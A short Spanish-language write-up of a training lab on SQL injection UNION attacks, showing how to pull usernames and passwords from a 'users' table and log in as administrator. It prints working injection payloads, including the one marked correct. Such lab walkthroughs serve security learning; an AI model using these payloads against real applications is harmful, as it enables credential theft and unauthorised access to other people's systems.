🐧Laboratorio: ataque UNION de inyección SQL , recuperando datos de otras tablas

Aqui ya debemos tener presente como acertar con el #columnas y saber cual es el tipo de dato que acepta 'X' columna. (Labs anteriores)

La base de datos contiene una tabla diferente llamada users, con columnas llamadas usernamey password.

Para resolver la práctica de laboratorio, realizamos un ataque UNION de inyección SQL que recupere todos los nombres de usuario y contraseñas, y utilizamos la información para iniciar sesión como administrator usuario.

La consulta SQL que vamos a inyectar podrá ser del tipo:

'+UNION+SELECT+username+password+FROM+users-- #ERROR SERVER
'+UNION+SELECT+username,password+FROM+users-- #FORMA CORRECTA
'+UNION+SELECT+username,password,FROM,users-- #ERROR SERVER

Cuando la embarramos con la consulta ese es el error que salta.

En cambio ahora que hicimos la consulta correcta con la opcion numero 2, nos mostro la misma consulta junto con los usernames y passwords:

Enhorabuena, lo pasamos.

PreviousLaboratorio: ataque UNION de inyección SQL , búsqueda de una columna que contiene texto NextLaboratorio: ataque UNION de inyección SQL , recuperando múltiples valores en una sola columna

Last updated 5 months ago